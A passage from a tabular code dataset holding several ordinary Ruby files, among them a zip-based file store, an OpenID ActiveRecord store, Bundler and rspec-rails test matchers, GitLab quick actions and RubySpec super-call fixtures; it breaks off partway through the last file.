hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
acbe7af04ad1cc35bc5f4bf83c484e1eac1259f1 | 3,144 | require 'zip'
require 'fileutils'
module Ld4lBrowserData
module Utilities
module FileSystems
class ZipFS
DEFAULT_PARAMS = {
:directory => '/DATA/DIR/NOT/SPECIFIED',
:prefix => 'http://draft.ld4l.org/'}
def initialize(params)
@settings = DEFAULT_PARAMS.merge(params)
@base_dir = @settings[:directory]
@prefix = @settings[:prefix]
end
# return a hash
def get_bookmark(key)
path = bookmark_path(key)
if File.exist?(path)
File.open(path) do |f|
JSON.load(f, nil, :symbolize_names => true)
end
else
nil
end
end
# contents is a hash
def set_bookmark(key, contents)
path = bookmark_path(key)
File.open(path, 'w') do |f|
JSON.dump(contents, f)
end
end
def bookmark_path(key)
File.join(@base_dir, 'bookmark_' + encode(key))
end
def acceptable?(uri)
uri.start_with?(@prefix)
end
def write(uri, contents)
name = remove_prefix(uri)
hash1, hash2 = hash_it(name)
safe_name = encode(name)
dir = File.join(@base_dir, hash1)
FileUtils.makedirs(dir)
path = File.join(dir, hash2 + '.zip')
Zip::File.open(path, Zip::File::CREATE) do |zip_file|
zip_file.get_output_stream(encode(uri)) do |out|
out.write (contents)
end
end
end
def remove_prefix(uri)
if uri.start_with?(@prefix)
uri[@prefix.size..-1]
else
uri
end
end
def hash_it(name)
hash = Zlib.crc32(name).to_s(16)
[hash[-4, 2], hash[-2, 2]]
end
ENCODE_REGEX = Regexp.compile("[\"*+,<=>?\\\\^|]|[^\x21-\x7e]", nil)
def encode(name)
name.gsub(ENCODE_REGEX) { |c| char2hex(c) }.tr('/:.', '=+,')
end
def close
# nothing to do
end
end
end
end
end
=begin
name = remove_prefix(uri)
hash1, hash2 = hash_it(name)
safe_name = encode(name)
File.join(@root_dir, hash1, hash2, safe_name + '.ttl')
Zip::File.open(zipfile_name, Zip::File::CREATE) do |zipfile|
input_filenames.each do |filename|
# Two arguments:
# - The name of the file as it will appear in the archive
# - The original file, including the path to find it
zipfile.add(filename, folder + '/' + filename)
end
zipfile.get_output_stream("myFile") { |os| os.write "myFile contains just this" }
end
Zip::File.open('my_zip.zip') do |zip_file|
# Handle entries one by one
zip_file.each do |entry|
if entry.directory?
puts "#{entry.name} is a folder!"
elsif entry.symlink?
puts "#{entry.name} is a symlink!"
elsif entry.file?
puts "#{entry.name} is a regular file!"
# Read into memory
content = entry.get_input_stream.read
# Output
puts content
else
puts "#{entry.name} is something unknown, oops!"
end
end
end
=end
| 25.152 | 83 | 0.549618 |
183ef2ecfe239b0bb2e540f4b34c5e45a70c464c | 1,830 | require 'ar_openid_store/association'
require 'ar_openid_store/nonce'
require 'openid/store/interface'
# not in OpenID module to avoid namespace conflict
class ActiveRecordStore < OpenID::Store::Interface
include ArOpenidStore
def store_association(server_url, assoc)
remove_association(server_url, assoc.handle)
Association.create(:server_url => server_url,
:handle => assoc.handle,
:secret => assoc.secret,
:issued => assoc.issued,
:lifetime => assoc.lifetime,
:assoc_type => assoc.assoc_type)
end
def get_association(server_url, handle=nil)
assocs = if handle.blank?
Association.find_all_by_server_url(server_url)
else
Association.find_all_by_server_url_and_handle(server_url, handle)
end
assocs.reverse.each do |assoc|
a = assoc.from_record
if a.expires_in == 0
assoc.destroy
else
return a
end
end if assocs.any?
return nil
end
def remove_association(server_url, handle)
Association.delete_all(['server_url = ? AND handle = ?', server_url, handle]) > 0
end
def use_nonce(server_url, timestamp, salt)
return false if Nonce.find_by_server_url_and_timestamp_and_salt(server_url, timestamp, salt)
return false if (timestamp - Time.now.to_i).abs > OpenID::Nonce.skew
Nonce.create(:server_url => server_url, :timestamp => timestamp, :salt => salt)
return true
end
def cleanup_nonces
now = Time.now.to_i
Nonce.delete_all(["timestamp > ? OR timestamp < ?", now + OpenID::Nonce.skew, now - OpenID::Nonce.skew])
end
def cleanup_associations
now = Time.now.to_i
Association.delete_all(['issued + lifetime > ?',now])
end
end
| 30.5 | 108 | 0.653005 |
01e11eb94d3f9353e6440f5feb16eaccdfcbc086 | 6,867 | # frozen_string_literal: true
require "forwardable"
require_relative "the_bundle"
module Spec
module Matchers
extend RSpec::Matchers
class Precondition
include RSpec::Matchers::Composable
extend Forwardable
def_delegators :failing_matcher,
:failure_message,
:actual,
:description,
:diffable?,
:expected,
:failure_message_when_negated
def initialize(matcher, preconditions)
@matcher = with_matchers_cloned(matcher)
@preconditions = with_matchers_cloned(preconditions)
@failure_index = nil
end
def matches?(target, &blk)
return false if @failure_index = @preconditions.index {|pc| !pc.matches?(target, &blk) }
@matcher.matches?(target, &blk)
end
def does_not_match?(target, &blk)
return false if @failure_index = @preconditions.index {|pc| !pc.matches?(target, &blk) }
if @matcher.respond_to?(:does_not_match?)
@matcher.does_not_match?(target, &blk)
else
[email protected]?(target, &blk)
end
end
def expects_call_stack_jump?
@matcher.expects_call_stack_jump? || @preconditions.any?(&:expects_call_stack_jump)
end
def supports_block_expectations?
@matcher.supports_block_expectations? || @preconditions.any?(&:supports_block_expectations)
end
def failing_matcher
@failure_index ? @preconditions[@failure_index] : @matcher
end
end
def self.define_compound_matcher(matcher, preconditions, &declarations)
raise "Must have preconditions to define a compound matcher" if preconditions.empty?
define_method(matcher) do |*expected, &block_arg|
Precondition.new(
RSpec::Matchers::DSL::Matcher.new(matcher, declarations, self, *expected, &block_arg),
preconditions
)
end
end
RSpec::Matchers.define :have_dep do |*args|
dep = Bundler::Dependency.new(*args)
match do |actual|
actual.length == 1 && actual.all? {|d| d == dep }
end
end
RSpec::Matchers.define :have_gem do |*args|
match do |actual|
actual.length == args.length && actual.all? {|a| args.include?(a.full_name) }
end
end
RSpec::Matchers.define :be_sorted do
diffable
attr_reader :expected
match do |actual|
expected = block_arg ? actual.sort_by(&block_arg) : actual.sort
actual.==(expected).tap do
# HACK: since rspec won't show a diff when everything is a string
differ = RSpec::Support::Differ.new
@actual = differ.send(:object_to_string, actual)
@expected = differ.send(:object_to_string, expected)
end
end
end
RSpec::Matchers.define :be_well_formed do
match(&:empty?)
failure_message do |actual|
actual.join("\n")
end
end
define_compound_matcher :read_as, [exist] do |file_contents|
diffable
match do |actual|
@actual = Bundler.read_file(actual)
values_match?(file_contents, @actual)
end
end
def indent(string, padding = 4, indent_character = " ")
string.to_s.gsub(/^/, indent_character * padding).gsub("\t", " ")
end
define_compound_matcher :include_gems, [be_an_instance_of(Spec::TheBundle)] do |*names|
match do
opts = names.last.is_a?(Hash) ? names.pop : {}
source = opts.delete(:source)
groups = Array(opts[:groups])
exclude_from_load_path = opts.delete(:exclude_from_load_path)
opts[:raise_on_error] = false
groups << opts
@errors = names.map do |name|
name, version, platform = name.split(/\s+/)
require_path = name == "bundler" ? "#{lib_dir}/bundler" : name.tr("-", "/")
version_const = name == "bundler" ? "Bundler::VERSION" : Spec::Builders.constantize(name)
code = []
code << "$LOAD_PATH.delete '#{exclude_from_load_path}'" if exclude_from_load_path
code << "require '#{require_path}.rb'"
code << "puts #{version_const}"
run code.join("; "), *groups
actual_version, actual_platform = out.strip.split(/\s+/, 2)
unless Gem::Version.new(actual_version) == Gem::Version.new(version)
next "#{name} was expected to be at version #{version} but was #{actual_version}"
end
unless actual_platform == platform
next "#{name} was expected to be of platform #{platform} but was #{actual_platform}"
end
next unless source
source_const = "#{Spec::Builders.constantize(name)}_SOURCE"
run "require '#{require_path}/source'; puts #{source_const}", *groups
unless out.strip == source
next "Expected #{name} (#{version}) to be installed from `#{source}`, was actually from `#{out}`"
end
end.compact
@errors.empty?
end
match_when_negated do
opts = names.last.is_a?(Hash) ? names.pop : {}
groups = Array(opts[:groups]) || []
opts[:raise_on_error] = false
@errors = names.map do |name|
name, version = name.split(/\s+/, 2)
run <<-R, *(groups + [opts])
begin
require '#{name}'
puts #{Spec::Builders.constantize(name)}
rescue LoadError, NameError
puts "WIN"
end
R
next if out == "WIN"
next "expected #{name} to not be installed, but it was" if version.nil?
if Gem::Version.new(out) == Gem::Version.new(version)
next "expected #{name} (#{version}) not to be installed, but it was"
end
end.compact
@errors.empty?
end
failure_message do
super() + " but:\n" + @errors.map {|e| indent(e) }.join("\n")
end
failure_message_when_negated do
super() + " but:\n" + @errors.map {|e| indent(e) }.join("\n")
end
end
RSpec::Matchers.define_negated_matcher :not_include_gems, :include_gems
RSpec::Matchers.alias_matcher :include_gem, :include_gems
def have_lockfile(expected)
read_as(strip_whitespace(expected))
end
def plugin_should_be_installed(*names)
names.each do |name|
expect(Bundler::Plugin).to be_installed(name)
path = Pathname.new(Bundler::Plugin.installed?(name))
expect(path + "plugins.rb").to exist
end
end
def plugin_should_not_be_installed(*names)
names.each do |name|
expect(Bundler::Plugin).not_to be_installed(name)
end
end
def lockfile_should_be(expected)
expect(bundled_app_lock).to have_lockfile(expected)
end
def gemfile_should_be(expected)
expect(bundled_app_gemfile).to read_as(strip_whitespace(expected))
end
end
end
| 32.7 | 109 | 0.612495 |
4a7b5c4c78967c70ed83218d3ff1cb62a29d160a | 511 | require 'spec_helper'
describe PeerReview do
it { is_expected.to belong_to(:result) }
it { is_expected.to belong_to(:reviewer) }
describe 'reviewee integrity' do
let!(:peer_review) { create(:peer_review) }
it 'reviewer should not be the reviewee' do
expect(peer_review.reviewer.id).to_not eq peer_review.reviewee.id
end
it 'should have reviewer have a review to others' do
expect(peer_review.reviewer.peer_reviews_to_others.first.id).to eq peer_review.id
end
end
end
| 26.894737 | 87 | 0.727984 |
ac4e4177fa7ee85cdc88a6d81cc17771dfbc4230 | 534 | Pod::Spec.new do |s|
s.name = "WTTranslateModel"
s.version = "0.0.5"
s.summary = "WTTranslateModel个人中心模块"
s.homepage = "https://github.com/aliang666/WTTranslateModel"
s.license = "MIT"
s.author = { "jienliang000" => "[email protected]" }
s.platform = :ios
s.platform = :ios, "8.0"
s.requires_arc = true
s.source = { :git => "https://github.com/aliang666/WTTranslateModel.git", :tag => "#{s.version}" }
s.source_files = "WTTranslateModel/*.{h,m}"
end
| 28.105263 | 106 | 0.582397 |
d540ce56f61855e04354c23c5ea7bc0218fc5e48 | 1,140 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v8/errors/not_allowlisted_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v8/errors/not_allowlisted_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v8.errors.NotAllowlistedErrorEnum" do
end
add_enum "google.ads.googleads.v8.errors.NotAllowlistedErrorEnum.NotAllowlistedError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :CUSTOMER_NOT_ALLOWLISTED_FOR_THIS_FEATURE, 2
end
end
end
module Google
module Ads
module GoogleAds
module V8
module Errors
NotAllowlistedErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v8.errors.NotAllowlistedErrorEnum").msgclass
NotAllowlistedErrorEnum::NotAllowlistedError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v8.errors.NotAllowlistedErrorEnum.NotAllowlistedError").enummodule
end
end
end
end
end
| 36.774194 | 202 | 0.765789 |
1aa5cdc997588a0f9adcf5c8fdabe6f35370d998 | 628 | #! /usr/bin/env ruby
require 'nokogiri'
filename = File.expand_path(ARGV[0])
html = ""
File.open(filename) do |f|
f.readlines.each do |line|
html << line
end
end
doc = Nokogiri::HTML(html)
doc.xpath('//comment()').each { |comment| comment.replace(comment.text) } #removes comment tags and exposes contents as html
all_arrs = []
doc.search('table').each do |table|
arr = []
table.search('tr').each do |row|
cells = row.search('th, td').map { |cell| cell.text.strip }
arr << cells
end
all_arrs << arr
end
all_arrs.each do |arr|
arr.each do |row|
puts row.join("\t")
end
puts "\n\n\n"
end
| 17.942857 | 124 | 0.636943 |
fff991f735f737ed8ca5d6c4cabceb53cccd19ba | 122 | class PhrasesController < ApplicationController
def index
phrases = Phrases.all
render json: phrases
end
end
| 17.428571 | 47 | 0.745902 |
b9ca67fd83dbf8adac75872dba66ce733da69115 | 324 | module Socialite
module Models
module FacebookIdentity
extend ActiveSupport::Concern
included do
include Socialite::ApiWrappers::Facebook
has_one :identity, :as => :api
delegate :access_token, :access_token_secret, :to => :identity, :allow_nil => true
end
end
end
end
| 21.6 | 90 | 0.660494 |
1d6ac4e9bced1f4646560b846e6d9d1b8fae84f0 | 622 | # ProjectHanlon Policy Base class
# Root abstract
module ProjectHanlon
module PolicyTemplate
class VMwareHypervisor < ProjectHanlon::PolicyTemplate::Base
include(ProjectHanlon::Logging)
# @param hash [Hash]
def initialize(hash)
super(hash)
@hidden = false
@template = :vmware_hypervisor
@description = "Policy for deploying a VMware hypervisor."
from_hash(hash) unless hash == nil
end
def mk_call(node)
model.mk_call(node, @uuid)
end
def boot_call(node)
model.boot_call(node, @uuid)
end
end
end
end
| 20.064516 | 66 | 0.635048 |
6aa3f515ef0d358cc9b4f66305ea6b91af812ea9 | 10,466 | # frozen_string_literal: true
module Gitlab
module QuickActions
module IssuableActions
extend ActiveSupport::Concern
include Gitlab::QuickActions::Dsl
SHRUG = '¯\\_(ツ)_/¯'
TABLEFLIP = '(╯°□°)╯︵ ┻━┻'
included do
# Issue, MergeRequest, Epic: quick actions definitions
desc do
_('Close this %{quick_action_target}') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
explanation do
_('Closes this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Closed this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.open? &&
current_user.can?(:"update_#{quick_action_target.to_ability_name}", quick_action_target)
end
command :close do
@updates[:state_event] = 'close'
end
desc do
_('Reopen this %{quick_action_target}') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
explanation do
_('Reopens this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Reopened this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.closed? &&
current_user.can?(:"update_#{quick_action_target.to_ability_name}", quick_action_target)
end
command :reopen do
@updates[:state_event] = 'reopen'
end
desc _('Change title')
explanation do |title_param|
_('Changes the title to "%{title_param}".') % { title_param: title_param }
end
execution_message do |title_param|
_('Changed the title to "%{title_param}".') % { title_param: title_param }
end
params '<New title>'
types Issuable
condition do
quick_action_target.persisted? &&
current_user.can?(:"update_#{quick_action_target.to_ability_name}", quick_action_target)
end
command :title do |title_param|
@updates[:title] = title_param
end
desc _('Add label(s)')
explanation do |labels_param|
labels = find_label_references(labels_param)
if labels.any?
_("Adds %{labels} %{label_text}.") %
{ labels: labels.join(' '), label_text: 'label'.pluralize(labels.count) }
end
end
params '~label1 ~"label 2"'
types Issuable
condition do
parent &&
current_user.can?(:"admin_#{quick_action_target.to_ability_name}", parent) &&
find_labels.any?
end
command :label do |labels_param|
run_label_command(labels: find_labels(labels_param), command: :label, updates_key: :add_label_ids)
end
desc _('Remove all or specific label(s)')
explanation do |labels_param = nil|
label_references = labels_param.present? ? find_label_references(labels_param) : []
if label_references.any?
_("Removes %{label_references} %{label_text}.") %
{ label_references: label_references.join(' '), label_text: 'label'.pluralize(label_references.count) }
else
_('Removes all labels.')
end
end
params '~label1 ~"label 2"'
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.labels.any? &&
current_user.can?(:"admin_#{quick_action_target.to_ability_name}", parent)
end
command :unlabel, :remove_label do |labels_param = nil|
if labels_param.present?
labels = find_labels(labels_param)
label_ids = labels.map(&:id)
label_references = labels_to_reference(labels, :name)
if label_ids.any?
@updates[:remove_label_ids] ||= []
@updates[:remove_label_ids] += label_ids
@updates[:remove_label_ids].uniq!
end
else
@updates[:label_ids] = []
label_references = []
end
@execution_message[:unlabel] = remove_label_message(label_references)
end
desc _('Replace all label(s)')
explanation do |labels_param|
labels = find_label_references(labels_param)
"Replaces all labels with #{labels.join(' ')} #{'label'.pluralize(labels.count)}." if labels.any?
end
params '~label1 ~"label 2"'
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.labels.any? &&
current_user.can?(:"admin_#{quick_action_target.to_ability_name}", parent)
end
command :relabel do |labels_param|
run_label_command(labels: find_labels(labels_param), command: :relabel, updates_key: :label_ids)
end
desc _('Add a To Do')
explanation _('Adds a To Do.')
execution_message _('Added a To Do.')
types Issuable
condition do
quick_action_target.persisted? &&
!TodoService.new.todo_exist?(quick_action_target, current_user)
end
command :todo do
@updates[:todo_event] = 'add'
end
desc _('Mark To Do as done')
explanation _('Marks To Do as done.')
execution_message _('Marked To Do as done.')
types Issuable
condition do
quick_action_target.persisted? &&
TodoService.new.todo_exist?(quick_action_target, current_user)
end
command :done do
@updates[:todo_event] = 'done'
end
desc _('Subscribe')
explanation do
_('Subscribes to this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Subscribed to this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
!quick_action_target.subscribed?(current_user, project)
end
command :subscribe do
@updates[:subscription_event] = 'subscribe'
end
desc _('Unsubscribe')
explanation do
_('Unsubscribes from this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Unsubscribed from this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.subscribed?(current_user, project)
end
command :unsubscribe do
@updates[:subscription_event] = 'unsubscribe'
end
desc _('Toggle emoji award')
explanation do |name|
_("Toggles :%{name}: emoji award.") % { name: name } if name
end
execution_message do |name|
_("Toggled :%{name}: emoji award.") % { name: name } if name
end
params ':emoji:'
types Issuable
condition do
quick_action_target.persisted?
end
parse_params do |emoji_param|
match = emoji_param.match(Banzai::Filter::EmojiFilter.emoji_pattern)
match[1] if match
end
command :award do |name|
if name && quick_action_target.user_can_award?(current_user)
@updates[:emoji_award] = name
end
end
desc _("Append the comment with %{shrug}") % { shrug: SHRUG }
params '<Comment>'
types Issuable
substitution :shrug do |comment|
"#{comment} #{SHRUG}"
end
desc _("Append the comment with %{tableflip}") % { tableflip: TABLEFLIP }
params '<Comment>'
types Issuable
substitution :tableflip do |comment|
"#{comment} #{TABLEFLIP}"
end
private
def run_label_command(labels:, command:, updates_key:)
return if labels.empty?
@updates[updates_key] ||= []
@updates[updates_key] += labels.map(&:id)
@updates[updates_key].uniq!
label_references = labels_to_reference(labels, :name)
@execution_message[command] = case command
when :relabel
_('Replaced all labels with %{label_references} %{label_text}.') %
{
label_references: label_references.join(' '),
label_text: 'label'.pluralize(label_references.count)
}
when :label
_('Added %{label_references} %{label_text}.') %
{
label_references: label_references.join(' '),
label_text: 'label'.pluralize(labels.count)
}
end
end
def remove_label_message(label_references)
if label_references.any?
_("Removed %{label_references} %{label_text}.") %
{ label_references: label_references.join(' '), label_text: 'label'.pluralize(label_references.count) }
else
_('Removed all labels.')
end
end
end
end
end
end
| 37.113475 | 117 | 0.571183 |
6a024cae236fc3ff2854973b88af453a24b2ded1 | 10,384 | module SuperSpecs
module S1
class A
def foo(a)
a << "A#foo"
bar(a)
end
def bar(a)
a << "A#bar"
end
end
class B < A
def foo(a)
a << "B#foo"
super(a)
end
def bar(a)
a << "B#bar"
super(a)
end
end
end
module S2
class A
def baz(a)
a << "A#baz"
end
end
class B < A
def foo(a)
a << "B#foo"
baz(a)
end
end
class C < B
def baz(a)
a << "C#baz"
super(a)
end
end
end
module S3
class A
def foo(a)
a << "A#foo"
end
def self.foo(a)
a << "A.foo"
end
def self.bar(a)
a << "A.bar"
foo(a)
end
end
class B < A
def self.foo(a)
a << "B.foo"
super(a)
end
def self.bar(a)
a << "B.bar"
super(a)
end
end
end
module S4
class A
def foo(a)
a << "A#foo"
end
end
class B < A
def foo(a, b)
a << "B#foo(a,#{b})"
super(a)
end
end
end
class S5
def here
:good
end
end
class S6 < S5
def under
yield
end
def here
under {
super
}
end
end
class S7 < S5
define_method(:here) { super() }
end
module MS1
module ModA
def foo(a)
a << "ModA#foo"
bar(a)
end
def bar(a)
a << "ModA#bar"
end
end
class A
include ModA
end
module ModB
def bar(a)
a << "ModB#bar"
super(a)
end
end
class B < A
def foo(a)
a << "B#foo"
super(a)
end
include ModB
end
end
module MS2
class A
def baz(a)
a << "A#baz"
end
end
module ModB
def foo(a)
a << "ModB#foo"
baz(a)
end
end
class B < A
include ModB
end
class C < B
def baz(a)
a << "C#baz"
super(a)
end
end
end
module MultiSuperTargets
module M
def foo
super
end
end
class BaseA
def foo
:BaseA
end
end
class BaseB
def foo
:BaseB
end
end
class A < BaseA
include M
end
class B < BaseB
include M
end
end
module MS3
module ModA
def foo(a)
a << "ModA#foo"
end
def bar(a)
a << "ModA#bar"
foo(a)
end
end
class A
def foo(a)
a << "A#foo"
end
class << self
include ModA
end
end
class B < A
def self.foo(a)
a << "B.foo"
super(a)
end
def self.bar(a)
a << "B.bar"
super(a)
end
end
end
module MS4
module Layer1
def example
5
end
end
module Layer2
include Layer1
def example
super
end
end
class A
include Layer2
public :example
end
end
class MM_A
undef_method :is_a?
end
class MM_B < MM_A
def is_a?(blah)
# should fire the method_missing below
super
end
def method_missing(*)
false
end
end
class Alias1
def name
[:alias1]
end
end
class Alias2 < Alias1
def initialize
@times = 0
end
def name
if @times >= 10
raise "runaway super"
end
@times += 1
# Use this so that we can see collect all supers that we see.
# One bug that arises is that we call Alias2#name from Alias2#name
# as it's superclass. In that case, either we get a runaway recursion
# super OR we get the return value being [:alias2, :alias2, :alias1]
# rather than [:alias2, :alias1].
#
# Which one depends on caches and how super is implemented.
[:alias2] + super
end
end
class Alias3 < Alias2
alias_method :name3, :name
# In the method table for Alias3 now should be a special alias entry
# that references Alias2 and Alias2#name (probably as an object).
#
# When name3 is called then, Alias2 (NOT Alias3) is presented as the
# current module to Alias2#name, so that when super is called,
# Alias2's superclass is next.
#
# Otherwise, Alias2 is next, which is where name was to begin with,
# causing the wrong #name method to be called.
end
module AliasWithSuper
module AS1
def foo
:a
end
end
module BS1
def foo
[:b, super]
end
end
class Base
extend AS1
extend BS1
end
class Trigger < Base
class << self
def foo_quux
foo_baz
end
alias_method :foo_baz, :foo
alias_method :foo, :foo_quux
end
end
end
module RestArgsWithSuper
class A
def a(*args)
args
end
end
class B < A
def a(*args)
args << "foo"
super
end
end
end
class AnonymousModuleIncludedTwiceBase
def self.whatever
mod = Module.new do
def a(array)
array << "anon"
super
end
end
include mod
end
def a(array)
array << "non-anon"
end
end
class AnonymousModuleIncludedTwice < AnonymousModuleIncludedTwiceBase
whatever
whatever
end
module ZSuperWithBlock
class A
def a
yield
end
def b(&block)
block.call
end
def c
yield
end
end
class B < A
def a
super { 14 }
end
def b
block_ref = -> { 15 }
[super { 14 }, super(&block_ref)]
end
def c
block_ref = -> { 16 }
super(&block_ref)
end
end
end
module ZSuperWithOptional
class A
def m(x, y, z)
z
end
end
class B < A
def m(x, y, z = 14)
super
end
end
class C < A
def m(x, y, z = 14)
z = 100
super
end
end
end
module ZSuperWithRest
class A
def m(*args)
args
end
def m_modified(*args)
args
end
end
class B < A
def m(*args)
super
end
def m_modified(*args)
args[1] = 14
super
end
end
end
module ZSuperWithRestAndOthers
class A
def m(a, b, *args)
args
end
def m_modified(a, b, *args)
args
end
end
class B < A
def m(a, b, *args)
super
end
def m_modified(a, b, *args)
args[1] = 14
super
end
end
end
module ZSuperWithRestReassigned
class A
def a(*args)
args
end
end
class B < A
def a(*args)
args = ["foo"]
super
end
end
end
module ZSuperWithRestReassignedWithScalar
class A
def a(*args)
args
end
end
class B < A
def a(*args)
args = "foo"
super
end
end
end
module ZSuperWithUnderscores
class A
def m(*args)
args
end
def m_modified(*args)
args
end
end
class B < A
def m(_, _)
super
end
def m_modified(_, _)
_ = 14
super
end
end
end
module Keywords
class Arguments
def foo(**args)
args
end
end
# ----
class RequiredArguments < Arguments
def foo(a:)
super
end
end
class OptionalArguments < Arguments
def foo(b: 'b')
super
end
end
class PlaceholderArguments < Arguments
def foo(**args)
super
end
end
# ----
class RequiredAndOptionalArguments < Arguments
def foo(a:, b: 'b')
super
end
end
class RequiredAndPlaceholderArguments < Arguments
def foo(a:, **args)
super
end
end
class OptionalAndPlaceholderArguments < Arguments
def foo(b: 'b', **args)
super
end
end
# ----
class RequiredAndOptionalAndPlaceholderArguments < Arguments
def foo(a:, b: 'b', **args)
super
end
end
end
module RegularAndKeywords
class Arguments
def foo(a, **options)
[a, options]
end
end
# -----
class RequiredArguments < Arguments
def foo(a, b:)
super
end
end
class OptionalArguments < Arguments
def foo(a, c: 'c')
super
end
end
class PlaceholderArguments < Arguments
def foo(a, **options)
super
end
end
# -----
class RequiredAndOptionalArguments < Arguments
def foo(a, b:, c: 'c')
super
end
end
class RequiredAndPlaceholderArguments < Arguments
def foo(a, b:, **options)
super
end
end
class OptionalAndPlaceholderArguments < Arguments
def foo(a, c: 'c', **options)
super
end
end
# -----
class RequiredAndOptionalAndPlaceholderArguments < Arguments
def foo(a, b:, c: 'c', **options)
super
end
end
end
module SplatAndKeywords
class Arguments
def foo(*args, **options)
[args, options]
end
end
class AllArguments < Arguments
def foo(*args, **options)
super
end
end
end
module FromBasicObject
def __send__(name, *args, &block)
super
end
end
module IntermediateBasic
include FromBasicObject
end
class IncludesFromBasic
include FromBasicObject
def foobar; 43; end
end
class IncludesIntermediate
include IntermediateBasic
def foobar; 42; end
end
module SingletonCase
class Base
def foobar(array)
array << :base
end
end
class Foo < Base
def foobar(array)
array << :foo
super
end
end
end
module SingletonAliasCase
class Base
def foobar(array)
array << :base
end
def alias_on_singleton
object = self
singleton = (class << object; self; end)
singleton.__send__(:alias_method, :new_foobar, :foobar)
end
end
class Foo < Base
def foobar(array)
array << :foo
super
end
end
end
end
| 14.898135 | 75 | 0.499326 |
62065d3563fd382a2963f5a80db006735be15b1a | 160 | class EventsController < ApplicationController
def index
@events = Event.order(time: :asc).where(time: 1.days.from_now..DateTime::Infinity.new)
end
end
| 26.666667 | 90 | 0.75 |
7a5c3f74be9debad8d74730df8bf4f4c465c1d2e | 136 | class AddColumnVotes < ActiveRecord::Migration
def change
add_column :votes, :up, :boolean, default: false, null: false
end
end
| 22.666667 | 65 | 0.735294 |
1c82339272bb914573f9374cb6be3ab7f3fbe4a5 | 2,195 | =begin
#Signing Today Web
#*Signing Today* is the perfect Digital Signature Gateway. Whenever in Your workflow You need to add one or more Digital Signatures to Your document, *Signing Today* is the right choice. You prepare Your documents, *Signing Today* takes care of all the rest: send invitations (`signature tickets`) to signers, collects their signatures, send You back the signed document. Integrating *Signing Today* in Your existing applications is very easy. Just follow these API specifications and get inspired by the many examples presented hereafter.
The version of the OpenAPI document: 2.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.2.3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SigningTodayAPIClient::DSTStatusChangedNotification
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'DSTStatusChangedNotification' do
before do
# run before each test
@instance = SigningTodayAPIClient::DSTStatusChangedNotification.new
end
after do
# run after each test
end
describe 'test an instance of DSTStatusChangedNotification' do
it 'should create an instance of DSTStatusChangedNotification' do
expect(@instance).to be_instance_of(SigningTodayAPIClient::DSTStatusChangedNotification)
end
end
describe 'test attribute "status"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
# validator = Petstore::EnumTest::EnumAttributeValidator.new('String', ["toFill", "toSign", "expired", "performed", "error"])
# validator.allowable_values.each do |value|
# expect { @instance.status = value }.not_to raise_error
# end
end
end
describe 'test attribute "dst"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "reason"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 37.844828 | 540 | 0.749886 |
91b653f9eb5aa7df9cbdb92ccf5526ff731ddcea | 2,119 | module RSpec::Rails::Matchers
# @api private
#
# Matcher class for `be_a_new`. Should not be instantiated directly.
#
# @see RSpec::Rails::Matchers#be_a_new
class BeANew < RSpec::Matchers::BuiltIn::BaseMatcher
# @private
def initialize(expected)
@expected = expected
end
# @private
def matches?(actual)
@actual = actual
actual.is_a?(expected) && actual.new_record? && attributes_match?(actual)
end
# @api public
# @see RSpec::Rails::Matchers#be_a_new
def with(expected_attributes)
attributes.merge!(expected_attributes)
self
end
# @private
def failure_message
[].tap do |message|
unless actual.is_a?(expected) && actual.new_record?
message << "expected #{actual.inspect} to be a new #{expected.inspect}"
end
unless attributes_match?(actual)
if unmatched_attributes.size > 1
message << "attributes #{unmatched_attributes.inspect} were not set on #{actual.inspect}"
else
message << "attribute #{unmatched_attributes.inspect} was not set on #{actual.inspect}"
end
end
end.join(' and ')
end
private
def attributes
@attributes ||= {}
end
def attributes_match?(actual)
attributes.stringify_keys.all? do |key, value|
actual.attributes[key].eql?(value)
end
end
def unmatched_attributes
attributes.stringify_keys.reject do |key, value|
actual.attributes[key].eql?(value)
end
end
end
# Passes if actual is an instance of `model_class` and returns `false` for
# `persisted?`. Typically used to specify instance variables assigned to
# views by controller actions
